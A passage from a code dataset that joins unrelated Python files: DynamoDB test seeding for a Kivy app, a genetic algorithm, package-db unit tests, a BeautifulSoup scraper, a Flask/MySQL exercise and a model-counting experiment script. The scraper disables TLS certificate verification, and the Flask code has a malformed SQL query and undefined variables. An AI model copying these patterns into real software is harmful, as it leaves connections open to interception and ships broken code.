Live',\n 'visible_to': 'NONE'\n },\n {\n 'platform_name': 'Steam',\n 'visible_to': 'ALL'\n }\n ]\n privacy3Games = [\n {\n 'platform_name': 'Steam',\n 'visible_to': 'FRIENDS'\n },\n {\n 'platform_name': 'Playstation Network',\n 'visible_to': 'NONE'\n }\n ]\n privacy4Games = [\n {\n 'platform_name': 'Xbox Live',\n 'visible_to': 'FRIENDS'\n },\n {\n 'platform_name': 'Steam',\n 'visible_to': 'ALL'\n }\n ]\n privacy5Games = [\n {\n 'platform_name': 'Steam',\n 'visible_to': 'ALL'\n },\n {\n 'platform_name': 'Playstation Network',\n 'visible_to': 'ALL'\n }\n ]\n privacy1Social = [\n {\n 'platform_name': 'Facebook',\n 'visible_to': 'FRIENDS'\n },\n {\n 'platform_name': 'Twitter',\n 'visible_to': 'ALL'\n }\n ]\n\n user1PrivacyGame = usersTable.update_item(\n Key={\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n },\n UpdateExpression='set privacy_settings = list_append(privacy_settings, :p)',\n ExpressionAttributeValues={\n ':p': privacy1Games,\n },\n ReturnValues='ALL_NEW'\n )\n\n user1PrivacySocial = usersTable.update_item(\n Key={\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n },\n UpdateExpression='set privacy_settings = list_append(privacy_settings, :s)',\n ExpressionAttributeValues={\n ':s': privacy1Social\n },\n ReturnValues='ALL_NEW'\n )\n\n user2PrivacyGame = usersTable.update_item(\n Key={\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n },\n UpdateExpression='set privacy_settings = list_append(privacy_settings, :p)',\n ExpressionAttributeValues={\n ':p': privacy2Games,\n },\n ReturnValues='ALL_NEW'\n )\n\n user2PrivacySocial = usersTable.update_item(\n Key={\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n },\n UpdateExpression='set privacy_settings = list_append(privacy_settings, :s)',\n ExpressionAttributeValues={\n ':s': privacy1Social\n },\n ReturnValues='ALL_NEW'\n )\n\n user3PrivacyGame = usersTable.update_item(\n Key={\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n },\n UpdateExpression='set privacy_settings = list_append(privacy_settings, :p)',\n ExpressionAttributeValues={\n ':p': privacy3Games,\n },\n ReturnValues='ALL_NEW'\n )\n\n user3PrivacySocial = usersTable.update_item(\n Key={\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n },\n UpdateExpression='set privacy_settings = list_append(privacy_settings, :s)',\n ExpressionAttributeValues={\n ':s': privacy1Social\n },\n ReturnValues='ALL_NEW'\n )\n\n user4PrivacyGame = usersTable.update_item(\n Key={\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n },\n UpdateExpression='set privacy_settings = list_append(privacy_settings, :p)',\n ExpressionAttributeValues={\n ':p': privacy4Games,\n },\n ReturnValues='ALL_NEW'\n )\n\n user4PrivacySocial = usersTable.update_item(\n Key={\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n },\n UpdateExpression='set privacy_settings = list_append(privacy_settings, :s)',\n ExpressionAttributeValues={\n ':s': privacy1Social\n },\n ReturnValues='ALL_NEW'\n )\n\n user5PrivacyGame = usersTable.update_item(\n Key={\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n },\n UpdateExpression='set privacy_settings = list_append(privacy_settings, :p)',\n ExpressionAttributeValues={\n ':p': privacy5Games,\n },\n ReturnValues='ALL_NEW'\n )\n\n user5PrivacySocial = usersTable.update_item(\n Key={\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n },\n UpdateExpression='set privacy_settings = list_append(privacy_settings, :s)',\n ExpressionAttributeValues={\n ':s': privacy1Social\n },\n ReturnValues='ALL_NEW'\n )\n\n # Update followed games\n print(\"===== Update followed games =====\")\n user1Games = [\n {\n 'game_id': h3Id,\n 'game_name': h3Name\n },\n {\n 'game_id': rsId,\n 'game_name': rsName\n }\n ]\n user2Games = [\n {\n 'game_id': h3Id,\n 'game_name': h3Name\n },\n {\n 'game_id': sc2Id,\n 'game_name': sc2Name\n }\n ]\n user3Games = [\n {\n 'game_id': sc2Id,\n 'game_name': sc2Name\n },\n {\n 'game_id': rsId,\n 'game_name': rsName\n }\n ]\n user4Games = [\n {\n 'game_id': sc2Id,\n 'game_name': sc2Name\n },\n {\n 'game_id': rsId,\n 'game_name': rsName\n }\n ]\n user5Games = [\n {\n 'game_id': rsId,\n 'game_name': rsName\n }\n ]\n\n h3Followers = [\n {\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n },\n {\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n }\n ]\n sc2Followers = [\n {\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n },\n {\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n },\n {\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n }\n ]\n rsFollowers = [\n {\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n },\n {\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n },\n {\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n },\n {\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n }\n ]\n\n user1GamesUpdate = usersTable.update_item(\n Key={\n 'uid': 'test-user-1',\n 'username': 'test_user1'\n },\n UpdateExpression='set followed_games = \\\n list_append(followed_games, :g)',\n ExpressionAttributeValues={\n ':g': user1Games\n },\n ReturnValues='ALL_NEW'\n )\n user2GamesUpdate = usersTable.update_item(\n Key={\n 'uid': 'test-user-2',\n 'username': 'test_user2'\n },\n UpdateExpression='set followed_games = \\\n list_append(followed_games, :g)',\n ExpressionAttributeValues={\n ':g': user2Games\n },\n ReturnValues='ALL_NEW'\n )\n user3GamesUpdate = usersTable.update_item(\n Key={\n 'uid': 'test-user-3',\n 'username': 'test_user3'\n },\n UpdateExpression='set followed_games = \\\n list_append(followed_games, :g)',\n ExpressionAttributeValues={\n ':g': user3Games\n },\n ReturnValues='ALL_NEW'\n )\n user4GamesUpdate = usersTable.update_item(\n Key={\n 'uid': 'test-user-4',\n 'username': 'test_user4'\n },\n UpdateExpression='set followed_games = \\\n list_append(followed_games, :g)',\n ExpressionAttributeValues={\n ':g': user4Games\n },\n ReturnValues='ALL_NEW'\n )\n user5GamesUpdate = usersTable.update_item(\n Key={\n 'uid': 'test-user-5',\n 'username': 'test_user5'\n },\n UpdateExpression='set followed_games = \\\n list_append(followed_games, :g)',\n ExpressionAttributeValues={\n ':g': user5Games\n },\n ReturnValues='ALL_NEW'\n )\n\n h3Update = gamesTable.update_item(\n Key={\n 'game_id': h3Id,\n 'name': h3Name\n },\n UpdateExpression='set followers = list_append(followers, :f)',\n ExpressionAttributeValues={\n ':f': h3Followers\n },\n ReturnValues='ALL_NEW'\n )\n sc2Update = gamesTable.update_item(\n Key={\n 'game_id': sc2Id,\n 'name': sc2Name\n },\n UpdateExpression='set followers = list_append(followers, :f)',\n ExpressionAttributeValues={\n ':f': sc2Followers\n },\n ReturnValues='ALL_NEW'\n )\n rsUpdate = gamesTable.update_item(\n Key={\n 'game_id': rsId,\n 'name': rsName\n },\n UpdateExpression='set followers = list_append(followers, :f)',\n ExpressionAttributeValues={\n ':f': rsFollowers\n },\n ReturnValues='ALL_NEW'\n )\n\n print(\"END RootApp.populateDynamoDB()\")\n\n def build(self):\n \"\"\"\n build() is called whenever this program is ran. It checks if there is a database file in its working directory,\n if not it calls initDynamoDB() and populateDynamoDB(). Finally it instantiates RootManager and returns it.\n :return: An instance of RootManager\n \"\"\"\n # check if .db file exists, if not create it\n if not os.path.isfile(dbFileWin) and not os.path.isfile(dbFileLin) and not os.path.isfile(dbFileWin10):\n self.initDynamoDB()\n self.populateDynamoDB()\n\n # set the screen size (Just for testing purposes)\n Window.size = (400, 600)\n # Config.set('graphics', 'width', '200')\n # Config.set('graphics', 'height', '400')\n\n # instantiate RootManager() and use it as the root widget of the app\n r = RootManager()\n self.root = r\n return r\n\n\nif __name__ == '__main__':\n RootApp().run()\n","sub_path":"root.py","file_name":"root.py","file_ext":"py","file_size_in_byte":66362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"293781975","text":"from Square import *\n\n\nclass Population:\n def __init__(self):\n self.squares = []\n for i in range(pop_size):\n s = Square()\n self.squares.append(s)\n all_sprites.add(s)\n pop_sprites.add(s)\n self.total_fitness = 0.0\n self.generation = 1\n self.best_square_dir = []\n self.best_square = Square\n\n def boost_fitness(self):\n best_steps = self.best_square.curr_step\n fixed_direction = best_steps\n new_squares = []\n for i in range(pop_size):\n if i < 50: # for the first 50 keep evolving normally\n baby = self.select_parent().get_baby()\n new_squares.append(baby)\n elif best_steps < n_steps and not self.best_square.has_reached_goal: # the best crushed somewhere\n baby = Square()\n if i < pop_size / 2:\n explosion = 50\n else:\n explosion = 15\n for j in range(fixed_direction - explosion):\n baby.dir[j] = self.best_square_dir[j]\n new_squares.append(baby)\n baby.add(all_sprites)\n baby.add(pop_sprites)\n else:\n baby = Square()\n remainder = i % 50\n if remainder == 0:\n fixed_direction -= 15\n baby.dir = cardinal_dir[remainder].copy()\n elif remainder < 4:\n baby.dir = cardinal_dir[remainder].copy()\n for j in range(fixed_direction):\n baby.dir[j] = self.best_square_dir[j]\n new_squares.append(baby)\n baby.add(all_sprites)\n baby.add(pop_sprites)\n self.squares = new_squares.copy()\n self.keep_best()\n self.generation += 1\n\n def compute_total_fitness(self):\n self.total_fitness = 0.0\n fittest = 0.0\n for square in self.squares:\n square.compute_fitness()\n if fittest < square.fitness:\n fittest = square.fitness\n self.best_square = square\n self.best_square_dir = square.dir.copy()\n self.total_fitness += square.fitness\n square.kill()\n\n def natural_selection(self):\n new_squares = []\n for i in range(0, pop_size):\n baby = self.select_parent().get_baby()\n new_squares.append(baby)\n self.squares = new_squares.copy()\n self.keep_best()\n self.generation += 1\n\n def select_parent(self):\n avg = self.total_fitness / pop_size\n rand = random.uniform(0.0, self.total_fitness)\n curr_sum = 0.0\n for square in self.squares:\n curr_sum += square.fitness\n if square.fitness > avg and curr_sum > rand:\n return square\n best = Square()\n best.dir = self.best_square_dir.copy()\n return best\n\n def keep_best(self):\n best = self.squares[0]\n best.dir = self.best_square_dir.copy()\n best.is_best = True\n best.image = pygame.Surface((square_side * 3, square_side * 3))\n best.image.fill(MAGENTA)\n","sub_path":"Population.py","file_name":"Population.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"210881930","text":"#!/usr/bin/env python3\nimport json\nimport os\nimport textwrap\nimport unittest\n\nfrom fs_image.common import nullcontext\nfrom fs_image.fs_utils import temp_dir\nfrom fs_image import update_package_db as updb\n\n_GENERATED = updb._GENERATED\n\n\nclass UpdatePackageDbTestCase(unittest.TestCase):\n\n def _check_file(self, path, content):\n with open(path) as infile:\n self.assertEqual(content, infile.read())\n\n def test_temp_file_error(self):\n with temp_dir() as td:\n path = td / 'dog'\n with open(path, 'w') as outfile:\n outfile.write('woof')\n with self.assertRaisesRegex(RuntimeError, '^woops$'):\n with updb._populate_temp_file_and_rename(path) as outfile:\n outfile.write('meow')\n tmp_path = outfile.name\n raise RuntimeError('woops')\n # Potentially can race with another tempfile creation, but this\n # should be vanishingly unlikely.\n self.assertFalse(os.path.exists(tmp_path))\n # Importantly, the original file is untouched.\n self._check_file(td / 'dog', 'woof')\n\n def _write_bzl_db(self, db_path, dct):\n with open(db_path, 'w') as outfile:\n # Not using `_with_generated_header` to ensure that we are\n # resilient to changes in the header.\n outfile.write(f'# A {_GENERATED} file\\n# second header line\\n')\n outfile.write(updb._BZL_DB_PREFIX)\n json.dump(dct, outfile)\n # Make sure our write implementation is sane.\n self.assertEqual(dct, updb._read_bzl_db(db_path))\n\n def _main(self, argv):\n updb.main(\n argv,\n nullcontext(lambda _pkg, _tag, opts: opts if opts else {'x': 'z'}),\n how_to_generate='how',\n overview_doc='overview doc',\n options_doc='opts doc',\n )\n\n def test_default_update(self):\n with temp_dir() as td:\n db_path = td / 'db.bzl'\n self._write_bzl_db(db_path, {'pkg': {'tag': {'foo': 'bar'}}})\n self._main(['--db', db_path.decode()])\n self._check_file(db_path, '# ' + _GENERATED + textwrap.dedent(''' \\\n SignedSource<<69d45bae7b77e0bd2ee0d5a285d6fdb3>>\n # Update via `how`\n package_db = {\n \"pkg\": {\n \"tag\": {\n \"x\": \"z\",\n },\n },\n }\n '''))\n\n def test_explicit_update(self):\n with temp_dir() as td:\n db_path = td / 'db.bzl'\n self._write_bzl_db(db_path, {\n 'p1': {'tik': {'foo': 'bar'}}, # replaced\n 'p2': {'tok': {'a': 'b'}}, # preserved\n })\n self._main([\n '--db', db_path.decode(),\n '--replace', 'p1', 'tik', '{\"choo\": \"choo\"}',\n '--create', 'p2', 'tak', '{\"boo\": \"hoo\"}',\n '--create', 'never', 'seen', '{\"oompa\": \"loompa\"}',\n '--no-update-existing',\n ])\n self._check_file(db_path, '# ' + _GENERATED + textwrap.dedent(''' \\\n SignedSource<<37820c384800aad6bf6ebe97f7e7c1a1>>\n # Update via `how`\n package_db = {\n \"never\": {\n \"seen\": {\n \"oompa\": \"loompa\",\n },\n },\n \"p1\": {\n \"tik\": {\n \"choo\": \"choo\",\n },\n },\n \"p2\": {\n \"tak\": {\n \"boo\": \"hoo\",\n },\n \"tok\": {\n \"a\": \"b\",\n },\n },\n }\n '''))\n\n def test_explicit_update_conflicts(self):\n with temp_dir() as td:\n db_path = td / 'db.bzl'\n self._write_bzl_db(db_path, {'p1': {'a': {}}, 'p2': {'b': {}}})\n with self.assertRaisesRegex(AssertionError, \"'p1', 'a'\"):\n self._main([\n '--db', db_path.decode(), '--create', 'p1', 'a', '{}',\n ])\n with self.assertRaisesRegex(AssertionError, \"'p2', 'c'\"):\n self._main([\n '--db', db_path.decode(), '--replace', 'p2', 'c', '{}',\n ])\n with self.assertRaisesRegex(RuntimeError, 'Conflicting \"replace\"'):\n self._main([\n '--db', db_path.decode(),\n '--replace', 'p2', 'b', '{}',\n '--replace', 'p2', 'b', '{}',\n ])\n\n def test_json_db(self):\n with temp_dir() as td:\n os.makedirs(td / 'idb/pkg')\n with open(td / 'idb/pkg/tag.json', 'w') as outfile:\n # Not using `_with_generated_header` to ensure that we are\n # resilient to changes in the header.\n outfile.write(f'# A {_GENERATED} file\\n# 2nd header line\\n')\n json.dump({'foo': 'bar'}, outfile)\n self.assertEqual(\n {'pkg': {'tag': {'foo': 'bar'}}},\n updb._read_json_dir_db(td / 'idb'),\n )\n self._main([\n '--db', (td / 'idb').decode(),\n '--out-db', (td / 'odb').decode(),\n ])\n self.assertEqual([b'pkg'], os.listdir(td / 'odb'))\n self.assertEqual([b'tag.json'], os.listdir(td / 'odb/pkg'))\n self._check_file(\n td / 'odb/pkg/tag.json',\n '# ' + _GENERATED + textwrap.dedent(''' \\\n SignedSource<>\n # Update via `how`\n {\n \"x\": \"z\"\n }\n '''))\n","sub_path":"fs_image/tests/test_update_package_db.py","file_name":"test_update_package_db.py","file_ext":"py","file_size_in_byte":5815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"384541293","text":"class student:\r\n def __init__(self):\r\n self.name=input(\"Enter student name:\")\r\n self.rollno=int(input(\"Enter student rollno:\"))\r\n self.branch=input(\"Enter student branch:\")\r\n self.rank=int(input(\"Enter rank:\"))\r\n def display(self):\r\n print(\"NAME:\",self.name)\r\n print(\"ROLLNO:\",self.rollno)\r\n print(\"BRANCH:\",self.branch)\r\n print(\"RANK:\",self.rank)\r\nprint(\"Enter student1 details:\")\r\ns1=student()\r\ns1.display()\r\n\r\n\r\n\r\nprint(\"Enter student2 details:\")\r\ns2=student()\r\ns2.display()\r\n\r\n\r\n \r\n \r\n","sub_path":"__Python/__Class and Object/python OOPS material/python OOPS material/17 constructor student.py","file_name":"17 constructor student.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"195920972","text":"import urllib.request, urllib.parse, urllib.error\nfrom bs4 import BeautifulSoup\nimport ssl\n\nctx = ssl.create_default_context()\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\n\nurl = input('Enter -')\nhtml = urllib.request.urlopen(url, context=ctx).read()\nsoup = BeautifulSoup(html, 'html.parser')\nsum = 0\ntags = soup('span')\nfor tag in tags:\n # Look at the parts of a tag\n print('TAG:',tag)\n print( 'URL:',tag.get('href', None))\n print( 'Contents:',tag.contents[0])\n print( 'Attrs:',tag.attrs)\n sum = sum + int(tag.contents[0])\nprint(sum) ","sub_path":"beatSoupAssignment.py","file_name":"beatSoupAssignment.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"34126836","text":"from flask import Flask, render_template, request, redirect\nfrom mysqlconnection import connectToMySQL \napp = Flask(__name__)\n\n@app.route(\"/users/new\", methods=['GET'])\ndef index(): \n return render_template(\"index.html\")\n\n@app.route(\"/add_user\", methods=['POST'])\ndef create_user(): \n mysql = connectToMySQL('mydb')\n query = \"INSERT INTO users (first_name, last_name, email, created_at, updated_at) VALUES (%(f)s, %(l)s, %(e)s, NOW(), NOW());\"\n data = {\n \"f\" : request.form['first_name'],\n \"l\" : request.form['last_name'],\n \"e\" : request.form['email']\n } \n user_id = str(mysql.query_db(query, data))\n return redirect('/users/' + str(user_id)) \n\n@app.route(\"/users\")\ndef users():\n mysql = connectToMySQL('mydb')\n one_user = mysql.query_db(\"SELECT * FROM users\")\n # destroy = mysql.query_db(\"DELETE FROM users WHERE id=''\") \n return render_template('show.html', all_users = one_user)\n\n# , delete = destroy\n\n@app.route(\"/edit_user\")\ndef edit():\n mysql = connectToMySQL('mydb')\t \n # user_id = mysql.query_db() \n return redirect('/users/' + str(user_id) + '/edit.html')\n\n@app.route('/users/')\ndef single_user(user_id):\n mysql = connectToMySQL('mydb')\n query = \"SELECT * FROM users WHERE %(i)s;\"\n data = {\n 'i' : request.form['id']\n }\n user_id = mysql.query_db(query, data)\n return render_template('users.html', user_id = id)\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"Python projects/flask/flask_mysql/users copy/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"37834156","text":"import subprocess, os, sys\nimport time\nimport argparse\nfrom partition_random_sample import *\nimport math\n##########################################################\n### PSMC on a CNF file without Aiger circuit unrolling ###\n##########################################################\n\n###################\n##argument parser##\n###################\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"filename\", help = \"cnf file path\")\nparser.add_argument(\"-k\", \"--num_partition_variables\", help = \"number of partitioning variables\", type = int, default = -1)\nparser.add_argument(\"-eo\", \"--epsilon_original\", help = \"epsilon bound on original\", type = float, default = 2)\nparser.add_argument(\"-ep\", \"--epsilon_partition\", help = \"epsilon bound on answer with 99% probability\", type = float, default = 2)\nparser.add_argument(\"-ad\", \"--original_delta\", help = \"the delta for the original\", type = float, default = .1)\nparser.add_argument(\"-pd\", \"--partition_delta\", help = \"the delta for the partitions\", type = float, default = .01)\nparser.add_argument(\"-ap\", \"--actual_probability\", help = \"don't calculate the exact probability; just use this number\", type = float, default = -1)\nparser.add_argument(\"--method\", action='store', choices=[\"3n/4\",\"n/2\", \"n-5\", \"nlogn\"], help='partitioning technique')\nparser.add_argument(\"--threshold\", help='number of iterations to convergence')\nparser.add_argument(\"--convergence_limit\", help='number of iterations to convergence')\nparser.add_argument(\"--ignore_original\", help = \"run scalmc on the original model\", action = \"store_true\")\nparser.add_argument(\"--ignore_partition\", help = \"run scalmc on the original model\", action = \"store_true\")\nargs = parser.parse_args()\nrun_on_partition = not args.ignore_partition\nrun_on_original = not args.ignore_original\nk = int(args.num_partition_variables)\nnum_clauses = 0\noriginal_count = 0\noriginal_time = 0\nn = 0\nfilename = args.filename\n\n##################################################################\n# Get the number of clauses and the number of counting variables #\n##################################################################\n\nsub_value = 0\nwith open(filename, 'r') as f:\n found = False\n file_lines = f.readlines()\n for i in range(len(file_lines)):\n x = file_lines[i]\n if \"c ind\" in x:\n n += len(x.split(' ')) - 3\n elif \"p cnf \" in x:\n num_clauses = int(x.split(' ')[-1])\n if n is 0:\n sub_value = int(x.split(' ')[-2])\nif n is 0:\n n = sub_value\nprint(\"File: \" + filename.split('/')[-1].split('.cnf')[0])\nprint(\"n = \" + str(n))\n\n#############################################\n# set the parameters appropriately # \n# pivotAC and epsilon for PSMC and original #\n#############################################\n\nepsilon_main = float(args.epsilon_original)\npivotAC_main = int(math.ceil(9.84 * (1 + (epsilon_main / (1.0 + epsilon_main))) * (1 + (1.0/epsilon_main)) * (1 + (1.0/epsilon_main))))\nepsilon_partition = float(args.epsilon_partition)\npivotAC_partition = int(math.ceil(9.84 * (1 + (epsilon_partition / (1.0 + epsilon_partition))) * (1 + (1.0/epsilon_partition)) * (1 + (1.0/epsilon_partition))))\n\ndelta_partition = float(args.partition_delta)\ndelta_original = float(args.original_delta)\n\n######################\n# SCALMC ON ORIGINAL #\n######################\n\nif run_on_original:\n ##count number of original solutions\n start = time.time()\n info = os.popen(\"./../../maxcount/scalmc --pivotAC \" + str(pivotAC_main) + \" --delta \" + str(delta_original) + \" \" + filename).readlines()[-1]\n # info = os.popen(\"./../../maxcount/scalmc --pivotAC \" + str(pivotAC_main) + \" --delta .05 \" + filename).readlines()[-1]\n # info = os.popen(\"./../../maxcount/scalmc \" + filename).readlines()[-1]\n num_sols = info.split(': ')[1].split(' x ')\n base, exp = int(num_sols[1].split('^')[0]), int(num_sols[1].split('^')[1].strip(\"\\n\"))\n original_count += int(num_sols[0]) * base**exp\n end = time.time()\n original_time = end - start\n j = 0\n\n # convert answer to scientific notation.\n while original_count % (2**(j+1)) == 0:\n j += 1\n original_count_str = str(original_count/(2**j)) + \" x 2^\" + str(j)\n # print(\"Original Probability: \" + str(float(original_count)/(2**n)))\n # print(\"epsilon for original = \" + str(epsilon_main))\n # print(\"Time for original: \" + str(original_time))\n # print(\"Original Count: \" + original_count_str)\n\n########################\n# SCALMC ON PARTITIONS #\n########################\nif run_on_partition:\n # if k (the number of partitioning variables) was never specified, calculate it according to the parameters of the cnf file\n if k == -1:\n if args.method == \"3n/4\":\n k = int(.75*n)\n elif args.method == \"n/2\":\n k = int(0.5*n)\n elif args.method == \"nlogn\":\n k = int(n - math.log(n, 2))\n else: \n k = n-5\n # print(\"Partitioning Technique: \" + str(args.method))\n # print(\"k = \" + str(k))\n\n # What should be the limit of convergence?\n convergence_limit = float(args.convergence_limit)\n # How many iterations where the density does not change by more than the convergence limit until we determine convergence?\n threshold = int(args.threshold)\n # How many free variables\n free_vars = n - k\n #partition the file, time it\n start = time.time()\n variable_order = get_top_vars(k, 1000, filename)\n partition_vars = variable_order[:k]\n end = time.time()\n #count number of partitioned solutions\n file_gen_time = end - start\n\n #how many iterations have i gone through in which the density has not deviated more than convergence_limit (the max allowed)?\n \n density_counter = 0\n\n #how to calculate the average density: density_sum/partitions_sampled (partitions_sampled is for CURRENT VALUE OF K)\n \n density_sum = 0.0\n total_files = 0\n partitions_sampled = 0 \n density = 0\n\n # time the algorithm\n partition_time = 0\n start = time.time()\n converged = False\n\n # which partitions have i tested?\n partitions = set()\n\n \n empty_counter = 0 # how many empty partitions have i sampled?\n delta = 0.1\n level = 1 # the number of values k has taken on.\n i = 0\n min_k = int(math.log(n, 2))\n #find p\n # p = 0\n # lim = n\n # while lim > 0:\n # lim = lim - (2**p) * math.log(n, 2)\n # p += 1\n # p -= 1\n final_start_time = time.time()\n while not converged:\n\n # What is k (# of partitioning variables) currently at? It is the max of (min_k, decremented_k)\n # because the idea is to reduce k by decreasing by 2 * math.log(n, 2) until it reaches the minimum possible size\n # once you reach the minimum possible size, stop decreasing k.\n\n decremented_k = int(n - (2**(level-1))*math.log(n, 2))\n min_k = int(math.log(n, 2))\n # if we have sampled a sufficient # of empty partitions....\n # n/(2**(level - 1)) : each time we increase k, we decrease the amount of empty partitions before a reset by a factor of 2\n # until we cannot decrease it anymore (the floor is max(2, math.log(n, 2))).\n if empty_counter > max(n/(2**(level - 1)), math.log(n, 2), 2) and min_k < decremented_k:\n # then reduce k by dividing by 2, tweak epsilon by multiplying by 2, and adjust pivot_AC accordingly.\n # also reset the density measures: partitions_sampled, density, density_counter, density_sum.\n\n epsilon_partition = min(epsilon_partition * 2, 1.2)\n pivotAC_partition = int(math.ceil(9.84 * (1 + (epsilon_partition / (1.0 + epsilon_partition))) * (1 + (1.0/epsilon_partition)) * (1 + (1.0/epsilon_partition))))\n empty_counter = 0\n level += 1\n partitions = set()\n density_counter = 0\n density_sum = 0.0\n partitions_sampled = 0\n density = 0\n i = 0\n # p = max (p-1, 0)\n decremented_k = int(n - (2**(level-1))*math.log(n, 2))\n min_k = int(math.log(n, 2))\n if args.method == \"nlogn\":\n # k = 10\n k = max(min_k, decremented_k)\n else:\n k = max(k-10, 0)\n # print(\"k: \" + str(k))\n partition_vars = variable_order[:k]\n final_start_time = time.time()\n\n old_density = density\n assignment_str = \"\"\n generator = time.time()\n\n # generate a partition assignment that has not been sampled yet.\n while assignment_str in partitions or assignment_str == \"\":\n assignment_str = random_string_generator(k)\n if len(partitions) == 2**k:\n converged = True\n break\n end_gen = time.time()\n partitions.add(assignment_str)\n # write the partition to file\n write_partition(partition_vars, filename, i, bin_string = assignment_str)\n info = os.popen(\"./../../maxcount/scalmc --pivotAC \" + str(pivotAC_partition) + \" --delta \" + str(delta_partition) + \" \" + filename.split('.cnf')[0] + \"-window-\" + str(i) + \".cnf\").readlines()[-1]\n # info = os.popen(\"./../../maxcount/scalmc --pivotAC \" + str(pivotAC_partition) + \" --delta \" + str(delta) + \" \" + filename.split('.cnf')[0] + \"-window-\" + str(i) + \".cnf\").readlines()[-1]\n # info = os.popen(\"./../../maxcount/scalmc \" + filename.split('.cnf')[0] + \"-window-\" + str(i) + \".cnf\").readlines()[-1]\n partitions_sampled += 1\n try:\n # if this partition is satisfiable...\n num_sols = info.split(': ')[1].split(' x ')\n base, exp = int(num_sols[1].split('^')[0]), int(num_sols[1].split('^')[1].strip(\"\\n\"))\n density_sum += float(int(num_sols[0]) * (base**exp))/(2**(n-k))\n density = density_sum/partitions_sampled\n empty_counter = 0\n\n #if the density does not change by more than convergence_limit\n if abs(density - old_density) <= convergence_limit:\n density_counter += 1\n if density_counter >= max(int(threshold/(2**(level-1))), 4):\n # GO TO THE ELSE CASE IF AND ONLY IF our density is 1 but we have sampled unSAT assignments when generating partitioning variables...\n if (not allOne and density != 1) or (allOne and density == 1):\n converged = True\n else:\n free_vars = int(free_vars * 2)\n k = n - free_vars\n density_counter = 0\n threshold = int(threshold / 2)\n if k <= 0 or threshold <= 1:\n converged = True\n density = 0\n density_sum = 0\n partition_vars = variable_order[:k]\n partitions = set()\n else:\n density_counter = 0\n except: \n # if the partition is unSAT\n empty_counter += 1\n density = density_sum/partitions_sampled\n if abs(density - old_density) > convergence_limit:\n density_counter = 0\n # print(density)\n total_files += 1\n i += 1\n end = time.time()\n partition_time = end - start\n partition_count = density * 2**n\n i = 0\n # while int(partition_count) % (2**(i+1)) == 0:\n # i += 1\n\n partition_count_str = str(int(partition_count)/(2**i)) + \" x 2^\" + str(i)\n print(\"************************************************\")\n print(\"Time for partitioned with partitioning overhead : {}\".format(partition_time + file_gen_time))\n if not args.ignore_original and not args.ignore_partition:\n print(\"Time for original: \" + str(original_time))\n print(\"Partitioned Probability: \" + str(density))\n if not args.ignore_original and not args.ignore_partition:\n print(\"Original Probability: \" + str(float(original_count)/(2**n)))\n print(\"Percent Error: \" + str(100*abs((density - float(original_count)/(2**n))/(float(original_count)/(2**n)))))\n print(\"************************************************\")\n\n # partition_count_str = str(int(partition_count)/(2**i)) + \" x 2^\" + str(i)\n # print(\"************************************************\")\n # print(\"Convergence Limit: \" + str(convergence_limit))\n # print(\"Iterations to Convergence - Threshold: \" + str(args.threshold))\n # print(\"Partitioned Probability: \" + str(density))\n # print(\"Time for partitioned with partitioning overhead : {}\".format(partition_time + file_gen_time))\n # print(\"Time for partitioned without partitioning overhead: {}\".format(partition_time))\n # print(\"Time taken for final k value: \" + str(end - final_start_time))\n # if not args.ignore_original and not args.ignore_partition:\n # print(\"Original Probability: \" + str(float(original_count)/(2**n)))\n # print(\"Time for original: \" + str(original_time))\n # print(\"Percent Error: \" + str(100*abs((density - float(original_count)/(2**n))/(float(original_count)/(2**n)))))\n # print(\"Number of partitions sampled: {}\".format(total_files))\n # print(\"Final # of partitioning variables (k): \" + str(k))\n # print(\"Number of partitions sampled with k = \" + str(k) + \": \" + str(partitions_sampled))\n # print(\"************************************************\")\n # print(\"Partitioned Count: \" + partition_count_str)\n\n# if args.actual_probability == -1:\n# prob = os.popen(\"aigcount \" + aiger_file + \"out.aag\").readlines()[0][:-2]\n# else:\n# prob = args.actual_probability\n# print(\"Actual Probability: \" + str(float(prob)))\n\n# if aiger:\n# os.system(\"./../aiger-1.9.9/aigand \" + aiger_file + \".aig \" + aiger_file + \".aig\")\n# os.system(\"./../aiger-1.9.9/aigtoaig \" + aiger_file + \".aig \" + aiger_file + \".aag\")\n# os.system(\"aigcompose \" + aiger_file + \".aag \" + \"tests/raw_files/source.aag \" + aiger_file + \".aag\")\n# prob = os.system(\"aigcount \" + aiger_file + \".aag\").readlines()\n# print(\"Actual Probability: \" + str(prob))\n","sub_path":"PSMC_backup/prob_approximator_cnf_direct.py","file_name":"prob_approximator_cnf_direct.py","file_ext":"py","file_size_in_byte":14110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"264957231","text":"# -*- 